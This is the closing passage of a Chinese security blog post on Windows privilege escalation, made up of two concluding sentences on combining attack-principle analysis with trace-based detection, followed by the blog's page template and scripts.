<p>而如果缺乏对攻击原理的熟悉，经常会忽视许多潜在的检测点，更别提去追溯相应日志了</p>
<p>从原理出发或者是从特征溯源，对攻击行为自上而下的分析和自下而上的分析其实是缺一不可的，结合使用才是正确的姿势</p>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2/" class="category-chain-item">安全攻防</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>走进Windows中的提权行为</div>
      <div>https://muchangfeng.com/2022/01/18/%E8%B5%B0%E8%BF%9BWindows%E4%B8%AD%E7%9A%84%E6%8F%90%E6%9D%83%E8%A1%8C%E4%B8%BA/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>慕长风</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年1月18日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/01/29/%E5%88%A9%E7%94%A8RITA%E6%A3%80%E6%B5%8Bbeacon%E9%80%9A%E4%BF%A1/" title="利用RITA检测beacon通信">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">利用RITA检测beacon通信</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/12/29/%E6%8F%AD%E7%A7%98rundll32%E4%B8%AD%E7%9A%84%E6%94%BB%E9%98%B2%E5%AF%B9%E6%8A%97/" title="揭秘rundll32中的攻防对抗">
                        <span class="hidden-mobile">揭秘rundll32中的攻防对抗</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.staticfile.org/valine/1.4.16/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"pDqTgkge6AYMMtLKaVJCILFv-gzGzoHsz","appKey":"b4RgBYwktF5lnglCRU472Azq","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail"],"requiredFields":["nick"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      记录和分享我的网安成长历程。
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  
    <script  src="/js/img-lazyload.js" ></script>
  



  <script  src="https://cdn.staticfile.org/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var title = subtitle.title;
      
        typing(title);
      
    })(window, document);
  </script>




  

  

  

  

  

  

  





  
<script>
  Fluid.utils.createScript('https://cdn.staticfile.org/tocbot/4.18.0/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://cdn.staticfile.org/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
